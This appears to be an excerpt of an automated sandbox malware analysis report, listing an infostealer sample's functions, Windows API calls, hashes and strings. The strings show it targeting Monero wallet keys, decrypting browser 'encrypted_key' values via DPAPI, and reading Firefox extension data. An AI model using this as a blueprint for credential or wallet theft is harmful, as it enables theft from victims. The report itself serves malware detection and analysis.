                  • Opcode ID: 9d434f057fc8e35b237be8ba217d9b974e645485c6bf37e903530afa653fb1f8
                  • Instruction ID: aab9cea96a916564d6976e680f1bbf767df8b8d4fd7d6aaa0321a624919b7452
                  • Opcode Fuzzy Hash: 9d434f057fc8e35b237be8ba217d9b974e645485c6bf37e903530afa653fb1f8
                  • Instruction Fuzzy Hash: 303138B1C01208AADB14EB90DD86FDEB778AF05310F404199F20976191DF746B89EF6A
                  Function 00C187C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C20E28,00000000,?), ref: 00C1882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C18836
                  • wsprintfA.USER32 ref: 00C18850
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: ddb1d40015ca67fe3ab163de97fbd24f2f85fdd6b320894ffbb403e67a356493
                  • Instruction ID: 49df9378c0f36f834d23494cd7e04b92a86aa54abfef644d3178dbfb5911f32e
                  • Opcode Fuzzy Hash: ddb1d40015ca67fe3ab163de97fbd24f2f85fdd6b320894ffbb403e67a356493
                  • Instruction Fuzzy Hash: 3A216DB5A80208AFDB04DF95DD49FAEBBB8FB49710F144129F605B7280C779A9058BA1
                  Function 00C18D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C1951E,00000000), ref: 00C18D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C18D62
                  • wsprintfW.USER32 ref: 00C18D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 8f6682c61a37085d4e0b7fbf9715c88a39d440ee0855285c03da2c9a1338af75
                  • Instruction ID: 9bcfe35c57a4ff45daa5839f60a9b8e36983f7afc37baf8cc25ae5d38b2ceef8
                  • Opcode Fuzzy Hash: 8f6682c61a37085d4e0b7fbf9715c88a39d440ee0855285c03da2c9a1338af75
                  • Instruction Fuzzy Hash: 87E08674A80208BFC714DB95DC0EE5977B8EB09711F040065FD0997280D9715E058B52
                  Function 00C0A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C0A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 00C0A3FF
                  • lstrlen.KERNEL32(00000000), ref: 00C0A6BC
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 00C0A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 2c74c44c7b5ed548d0df6150b769012150fa66693a3c0bd8fd7f6a9adf8d5a61
                  • Instruction ID: 2488c3803bcee709529185461dd1720d2ab14bec2f1c89e549186ab16c06f0c9
                  • Opcode Fuzzy Hash: 2c74c44c7b5ed548d0df6150b769012150fa66693a3c0bd8fd7f6a9adf8d5a61
                  • Instruction Fuzzy Hash: FCE10B728111189BDB05FBA4DD92EEE7338AF15310F548169F516B20D1EF306A8EFB62
                  Function 00C0D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C0D481
                  • lstrlen.KERNEL32(00000000), ref: 00C0D698
                  • lstrlen.KERNEL32(00000000), ref: 00C0D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 00C0D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: a6866907f257a58c657218e2791819423906bb46ddc7cea82a0592c6436fd7b4
                  • Instruction ID: 608dff1abf807d88c4ca2265dcc377c5e3856e7c0d50e30468533f62a2013c43
                  • Opcode Fuzzy Hash: a6866907f257a58c657218e2791819423906bb46ddc7cea82a0592c6436fd7b4
                  • Instruction Fuzzy Hash: 639141728111089BDB04FBA0DD96EEE7338AF15310F544169F517B60D1EF346A8AFBA2
                  Function 00C0D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C18B60: GetSystemTime.KERNEL32(00C20E1A,0179A790,00C205AE,?,?,00C013F9,?,0000001A,00C20E1A,00000000,?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C18B86
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C0D801
                  • lstrlen.KERNEL32(00000000), ref: 00C0D99F
                  • lstrlen.KERNEL32(00000000), ref: 00C0D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 00C0DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 9341a8f57bb487cc50196f07895107a0ccffcaf59292aa3c43d0be11912587e4
                  • Instruction ID: 3395a8f6aacdae25da20ab1f7c2489eaf618a2c0eed14afa41c8ac9b561b3eb4
                  • Opcode Fuzzy Hash: 9341a8f57bb487cc50196f07895107a0ccffcaf59292aa3c43d0be11912587e4
                  • Instruction Fuzzy Hash: 838154729111089BDB04FBA0DD96EEE7338AF15310F544129F407B60D1EF346A8AFBA2
                  Function 00C0F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00C21580,00C20D92), ref: 00C0F54C
                  • lstrlen.KERNEL32(00000000), ref: 00C0F56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 594843bc006cdb749ade052f96298e7d2b4024cd862b90c6d6c38a5c38c1015f
                  • Instruction ID: e63266dd368212c9ccb94701e795f7dff5fab29020ea9f0a1f64f214824b4c34
                  • Opcode Fuzzy Hash: 594843bc006cdb749ade052f96298e7d2b4024cd862b90c6d6c38a5c38c1015f
                  • Instruction Fuzzy Hash: FE512371D111089ADB04FBB0DD96DED7338AF55310F448528F816A71D1EE34AB8AFBA2
                  Function 00C13560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: a0517bef4c80abafd39480c0111340bce6dce657ac43efaf6309512888c7c9cf
                  • Instruction ID: 4a6a30a9f7fbf79653691d2291fff3c4d2b8680f1e80635e63faff3decf0ed81
                  • Opcode Fuzzy Hash: a0517bef4c80abafd39480c0111340bce6dce657ac43efaf6309512888c7c9cf
                  • Instruction Fuzzy Hash: 004182B1D10108AFCB04EFE5D945AEEB774BF55314F108028F41677291DB34AA46EFA2
                  Function 00C09CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                    • Part of subcall function 00C099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                    • Part of subcall function 00C099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                    • Part of subcall function 00C099C0: ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                    • Part of subcall function 00C099C0: LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                    • Part of subcall function 00C099C0: CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                    • Part of subcall function 00C18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C18E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C09D39
                    • Part of subcall function 00C09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09AEF
                    • Part of subcall function 00C09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00C04EEE,00000000,?), ref: 00C09B01
                    • Part of subcall function 00C09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C04EEE,00000000,00000000), ref: 00C09B2A
                    • Part of subcall function 00C09AC0: LocalFree.KERNEL32(?,?,?,?,00C04EEE,00000000,?), ref: 00C09B3F
                    • Part of subcall function 00C09B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C09B84
                    • Part of subcall function 00C09B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C09BA3
                    • Part of subcall function 00C09B60: LocalFree.KERNEL32(?), ref: 00C09BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 440d3dfb833447f4be7cb8462fea9f4322a2650e3a52e25ad26c646f7fbda20c
                  • Instruction ID: b35c7d462ba25f97b6c79bd4d9bb9341f0c2da3ebf7da33bb4d26c7fa4de4c41
                  • Opcode Fuzzy Hash: 440d3dfb833447f4be7cb8462fea9f4322a2650e3a52e25ad26c646f7fbda20c
                  • Instruction Fuzzy Hash: 603130B5D10209ABCB14EFE4DC85BEEB7B8EF48304F144519E915A7282E7349A44CBA1
                  Function 00C194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00C194EB
                    • Part of subcall function 00C18D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C1951E,00000000), ref: 00C18D5B
                    • Part of subcall function 00C18D50: RtlAllocateHeap.NTDLL(00000000), ref: 00C18D62
                    • Part of subcall function 00C18D50: wsprintfW.USER32 ref: 00C18D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00C195AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C195C9
                  • CloseHandle.KERNEL32(00000000), ref: 00C195D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
